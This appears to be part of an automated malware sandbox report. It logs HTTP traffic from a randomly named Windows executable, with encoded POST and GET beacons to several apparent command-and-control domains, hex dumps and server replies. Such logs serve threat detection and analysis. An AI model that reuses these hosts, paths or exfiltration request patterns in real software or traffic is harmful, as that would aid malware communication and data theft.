                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.55003577.68.64.45806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:58.653287888 CET486OUTGET /725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.dietcoffee.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:51:59.883641958 CET373INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:59 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 32 35 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.550038208.91.197.27806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:06.290647984 CET749OUTPOST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 73 6c 5a 5a 76 78 61 2f 31 43 73 49 62 2b 42 72 30 2b 4e 56 37 67 77 64 74 71 4f 2f 42 4a 57 59 48 4b 49 4e 30 62 47 56 77 62 36 62 62 34 2b 62 75 34 46 55 2b 5a 50 7a 6f 4c 39 7a 34 70 4a 6a 4b 71 75 35 76 31 46 72 41 55 6c 35 69 73 79 43 4b 58 38 50 75 41 48 31 39 39 53 55 49 4e 72 41 42 37 39 61 50 45 56 53 43 78 6f 62 79 52 4c 32 38 37 4e 37 4c 7a 78 41 2b 6e 42 36 48 50 53 7a 4d 2f 64 56 69 4d 77 4f 31 33 56 4a 52 71 51 4e 2f 42 41 71 2b 64 6a 6c 39 71 4c 49 42 6b 65 45 6e 4e 52 49 33 4d 63 54 31 43 2f 72 65 64 2f 2b 44 79 48 2f 47 46 54 59 37 44 4d 3d
                                                                                Data Ascii: NVK8=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+djl9qLIBkeEnNRI3McT1C/red/+DyH/GFTY7DM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.550039208.91.197.27806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:09.102816105 CET769OUTPOST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 36 59 4a 49 41 4e 33 61 47 56 6a 72 36 62 51 59 2b 61 71 34 46 62 2b 5a 43 4d 6f 4f 64 7a 34 70 64 6a 4b 6f 47 35 76 45 46 30 41 45 6c 42 76 4d 79 4d 4a 6e 38 50 75 41 48 31 39 35 37 4a 49 4d 50 41 42 4f 74 61 4e 6c 56 52 42 78 6f 63 6c 68 4c 32 34 37 4e 2f 4c 7a 78 69 2b 69 5a 55 48 4e 36 7a 4d 2b 74 56 6c 66 6f 4e 69 48 56 4c 63 4b 52 6b 79 44 67 6b 79 64 37 66 36 49 54 49 52 6b 43 39 6d 37 67 69 74 75 55 37 6d 69 54 54 4f 4f 33 4a 53 43 6d 57 63 6d 44 6f 6c 55 5a 64 63 46 39 52 36 72 47 6d 72 36 61 66 6a 55 77 37 64 51 57 6e
                                                                                Data Ascii: NVK8=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7miTTOO3JSCmWcmDolUZdcF9R6rGmr6afjUw7dQWn


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.550040208.91.197.27806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:11.848484039 CET1786OUTPOST /v2ut/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.guacamask.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.guacamask.online
                                                                                Referer: http://www.guacamask.online/v2ut/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 79 59 4a 36 34 4e 30 39 53 56 67 72 36 62 54 59 2b 66 71 34 46 38 2b 5a 4c 46 6f 4f 5a 6a 34 71 6c 6a 4d 4c 2b 35 70 77 70 30 4c 45 6c 42 77 63 79 4e 4b 58 38 47 75 47 6e 35 39 39 66 4a 49 4d 50 41 42 4a 56 61 44 6b 56 52 48 78 6f 62 79 52 4c 71 38 37 4e 62 4c 7a 6f 64 2b 6a 4a 71 48 39 61 7a 4e 65 39 56 67 74 77 4e 2b 58 56 7a 66 4b 52 38 79 44 74 6d 79 64 57 6b 36 4a 32 74 52 6d 43 39 72 76 56 2f 39 71 45 55 39 52 76 46 63 50 76 4f 49 6b 4f 32 57 32 7a 76 75 54 4a 37 52 6b 68 34 31 62 43 69 6a 6f 37 33 31 41 4d 4d 4e 32 44 78 56 49 75 35 70 38 48 47 6e 2b 4f 66 56 4a 63 6f 61 36 72 41 4a 63 2b 42 6b 57 7a 33 4a 73 56 71 75 4b 42 68 44 6f 52 6e 70 6d 47 53 73 37 4f 4c 77 6a 4f 78 75 56 75 6d 47 5a 6d 39 69 46 48 63 57 2f 75 34 6b 59 43 77 47 57 62 73 55 54 68 38 4e 71 56 30 42 74 64 46 6d 50 37 61 75 4d 7a 32 6f 6c 57 6a 6a 72 68 58 47 70 78 38 35 46 53 35 50 [TRUNCATED]
                                                                                Data Ascii: NVK8=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA9yYJ64N09SVgr6bTY+fq4F8+ZLFoOZj4qljML+5pwp0LElBwcyNKX8GuGn599fJIMPABJVaDkVRHxobyRLq87NbLzod+jJqH9azNe9VgtwN+XVzfKR8yDtmydWk6J2tRmC9rvV/9qEU9RvFcPvOIkO2W2zvuTJ7Rkh41bCijo731AMMN2DxVIu5p8HGn+OfVJcoa6rAJc+BkWz3JsVquKBhDoRnpmGSs7OLwjOxuVumGZm9iFHcW/u4kYCwGWbsUTh8NqV0BtdFmP7auMz2olWjjrhXGpx85FS5P6PxqAO/fW5icSiVHkxTNlQzJvKJGLG0I2rkSj7J/Z35U0M7EN9YkemeF6v96dMHFlmIHU62UXoj979EXY/HDBWX4rOk9CvB98pk/CpZq5VSd/FLlgOF1DZkDw0rkaMnq+/oOQIod8K78mbyFjdPh9nUIYYQGJfzknPt4fyt1hKaA5JkURYm9ff4wmLy+BRgWQlqQGk0/DIttwIHiGmjB1IcuXz9IWV4vz0IJYgQwKt/YXjQgA5QdLsNLD0XDxTavEHeyn+f2MsBi+zNItdjSG9hr6BPwW+BDA5WhjFfZj6tRJxAHvnnQhf8GQV69iHOAlFny1rJ0OMBDFnMwNsHSjFdqQhisCWPDKTJ86D8wl7WYB6Psh2X8NpGXA5BJ7yZX/myN0s+XnoJu4rP/9+qj5FourRncePj34BNDKsvcMg9m6BljDPjKcA2k8R3rhCCWhL+cB4cMkVnjOg7+g/FkxWHkCK6IzfeKUUCZTpkU5ZgXkJgluOKMepWqvoYgdZjpuVTFeTNGyoN1v9nIwG7ajlZ0mJzm9ZGD9CU8eczN+35PoCkLEb9pcv0UcDOU0s/YFDIn4DYYCvbkAY6MghcbFmXCsIpzNPFK2qRTp42SctzR1sbeZBZ/SRuaqsD69Xn1fIrXeIfFaqT09NTHLRb+OV7le48jXQWOBz [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.550041208.91.197.27806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:14.525094986 CET485OUTGET /v2ut/?NVK8=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLbDhgs8DELm8MllGE9YflG7OlToR8O0B4KwAawBiq2KURdg==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.guacamask.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:52:15.990859032 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:52:15 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=903vr481726335611487398; expires=Thu, 13-Dec-2029 12:52:15 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fEwYFA6UlTPtOt4tkZXeueMIINfcHWLIWRAzmpinWnSckp4XXaqlnxdNyKSLHn/aGHfWPahFOT02Jpobem61wQ==
                                                                                Content-Length: 2620
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 66 45 77 59 46 41 36 55 6c 54 50 74 4f 74 34 74 6b 5a 58 65 75 65 4d 49 49 4e 66 63 48 57 4c 49 57 52 41 7a 6d 70 69 6e 57 6e 53 63 6b 70 34 58 58 61 71 6c 6e 78 64 4e 79 4b 53 4c 48 6e 2f 61 47 48 66 57 50 61 68 46 4f 54 30 32
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fEwYFA6UlTPtOt4tkZXeueMIINfcHWLIWRAzmpinWnSckp4XXaqlnxdNyKSLHn/aGHfWPahFOT02
                                                                                Dec 14, 2024 13:52:15.990881920 CET1236INData Raw: 4a 70 6f 62 65 6d 36 31 77 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79
                                                                                Data Ascii: Jpobem61wQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=2"></script><
                                                                                Dec 14, 2024 13:52:15.990911961 CET1139INData Raw: 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47
                                                                                Data Ascii: a content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.55004284.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:21.707577944 CET746OUTPOST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 47 67 6f 78 67 2f 42 37 54 6e 64 6d 4d 6b 6f 4a 5a 68 44 6a 68 31 63 67 52 4c 6b 65 6e 72 33 63 4a 36 48 6a 6c 48 6e 76 39 61 53 6e 69 6c 74 59 52 4b 41 78 5a 6f 57 47 65 65 4a 72 38 4b 33 6e 2f 6b 48 41 4a 6c 55 41 53 65 74 35 6d 31 6a 46 4e 70 6f 39 6e 71 4e 49 6a 2b 73 55 39 72 63 75 45 4a 57 48 63 6d 4c 54 44 61 44 70 56 34 57 5a 67 6e 35 68 72 63 4d 2f 54 6f 39 41 5a 2f 4f 59 76 52 57 4c 30 4f 6e 56 58 73 67 69 33 71 73 69 4f 50 6c 55 52 43 63 66 6a 46 2f 5a 44 4c 46 45 6d 2b 79 2f 30 2b 4c 2f 64 30 6b 5a 4f 42 69 74 75 33 51 48 55 31 48 44 4e 49 3d
                                                                                Data Ascii: NVK8=yb4QGOcDnWALXGgoxg/B7TndmMkoJZhDjh1cgRLkenr3cJ6HjlHnv9aSniltYRKAxZoWGeeJr8K3n/kHAJlUASet5m1jFNpo9nqNIj+sU9rcuEJWHcmLTDaDpV4WZgn5hrcM/To9AZ/OYvRWL0OnVXsgi3qsiOPlURCcfjF/ZDLFEm+y/0+L/d0kZOBitu3QHU1HDNI=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.55004384.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:24.374974966 CET766OUTPOST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 52 54 33 62 73 65 48 69 67 37 6e 73 39 61 53 76 43 6c 6b 58 78 4c 4d 78 5a 6c 6a 47 62 2b 4a 72 38 32 33 6e 2b 30 48 63 71 39 4c 61 69 65 76 2f 6d 31 68 59 39 70 6f 39 6e 71 4e 49 6a 36 56 55 35 48 63 76 33 52 57 47 2b 65 49 51 44 61 41 71 56 34 57 64 67 6d 77 68 72 63 69 2f 57 49 58 41 61 48 4f 59 74 5a 57 4c 6d 6d 67 43 48 73 71 76 58 72 41 70 4e 36 78 54 43 4b 6f 53 56 59 6d 61 51 6e 45 42 51 50 59 6c 57 32 6a 73 39 59 63 4a 64 4a 56 38 65 57 35 64 33 6c 33 64 61 66 2b 36 55 54 73 59 69 4b 63 2b 73 52 6a 62 48 6b 6a 69 33 72 4b
                                                                                Data Ascii: NVK8=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeRT3bseHig7ns9aSvClkXxLMxZljGb+Jr823n+0Hcq9Laiev/m1hY9po9nqNIj6VU5Hcv3RWG+eIQDaAqV4Wdgmwhrci/WIXAaHOYtZWLmmgCHsqvXrApN6xTCKoSVYmaQnEBQPYlW2js9YcJdJV8eW5d3l3daf+6UTsYiKc+sRjbHkji3rK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.55004484.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:27.053821087 CET1783OUTPOST /qt4m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.appsolucao.shop
                                                                                Referer: http://www.appsolucao.shop/qt4m/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 53 7a 33 62 61 43 48 6a 44 54 6e 74 39 61 53 77 79 6c 68 58 78 4b 57 78 59 4e 34 47 62 37 38 72 35 79 33 6f 38 73 48 51 50 4a 4c 50 79 65 76 79 47 31 69 46 4e 70 78 39 6e 36 4a 49 6a 4b 56 55 35 48 63 76 32 68 57 42 73 6d 49 57 44 61 44 70 56 34 53 5a 67 6d 63 68 72 46 66 2f 57 38 74 63 37 6e 4f 59 4e 70 57 47 7a 36 67 42 6e 73 6b 73 58 72 59 70 4e 6d 48 54 43 6e 58 53 56 45 4d 61 54 48 45 41 6d 57 2f 68 6e 75 4c 33 66 49 6a 4c 65 4e 47 6a 34 66 59 64 6b 35 57 56 62 2f 65 78 57 48 55 57 31 32 41 71 64 6b 7a 61 51 41 6a 7a 68 36 77 73 46 2f 59 2b 74 39 6d 35 2f 6f 49 76 2b 47 6d 74 33 57 49 4b 48 32 6c 46 33 68 52 6b 52 64 61 6c 2f 48 7a 5a 6e 57 77 55 54 57 4c 34 50 57 67 6f 76 78 33 4a 7a 6a 44 6c 34 32 4d 30 39 4f 56 50 66 61 73 46 56 79 70 77 33 6a 51 38 45 6c 71 41 76 34 71 65 79 4b 57 66 6f 47 70 75 7a 4f 53 35 56 30 53 49 6d 55 64 4a 30 54 30 47 4f 41 53 39 [TRUNCATED]
                                                                                Data Ascii: NVK8=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeSz3baCHjDTnt9aSwylhXxKWxYN4Gb78r5y3o8sHQPJLPyevyG1iFNpx9n6JIjKVU5Hcv2hWBsmIWDaDpV4SZgmchrFf/W8tc7nOYNpWGz6gBnsksXrYpNmHTCnXSVEMaTHEAmW/hnuL3fIjLeNGj4fYdk5WVb/exWHUW12AqdkzaQAjzh6wsF/Y+t9m5/oIv+Gmt3WIKH2lF3hRkRdal/HzZnWwUTWL4PWgovx3JzjDl42M09OVPfasFVypw3jQ8ElqAv4qeyKWfoGpuzOS5V0SImUdJ0T0GOAS9+iNoFytkaFrK28p4MTOZy7/6RO2K34cYysMOY2M/4ITpEyUkJdZjwry1vBG+dzmpbCbnA5w6pM3odYWoZMnYL3trz6AioXxe8A4W2zoVqusVkV8/M66WG0p8jAmLowKu0NT7x/Y7CLLs48NmfJ+ym4v/XPO8yQZ5WPI6PBw3+xrTNKaMR2IDvzFZIioh+C2ukA0qAQWHlKo5GwHnSWv/i1xEBZ2ORQY61fFHOaq7cHohs7inNWLa5J8imw4YFqR/nZFK6hWYau8ilcc4Rk0t4KsBQGeJDQCEemvf6kkfrQBED6mivRLO/HCKLjNSx8+5/fhyVJO9q7VrR9ZNf23og4ULG6kVkU2lEfRx7CW8Uot6A4VqRKe10q97AXU4Jos/+u0GAvRm5Z96zNlJvV9kB/FPKnNqEBAVw3UyH6PT28WKR7Lhm/zCal023mlC6vZEvPlmE5ZUzMrUyfdQnIncUltXPfQBeq6hK3wHKdNULmQgrGOTfIGwuCo5NBLyL3ftsEuD2Rcw5u5RkDGHUWWRVVUS7pJyMhINehWntu1v0t4WqGZbQaBsWiYLjAdVM0JTZPW/RNiNH9ZXKDAPboZPTVmIdSCFbvdOjqUG6ejnC/KQxxWBteVobi2IKgAH7N1yPly2RIGKhMPSURuwEO7pywv7yF+mlQZZMF [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.55004584.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:29.711357117 CET484OUTGET /qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.appsolucao.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:52:30.801634073 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:52:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
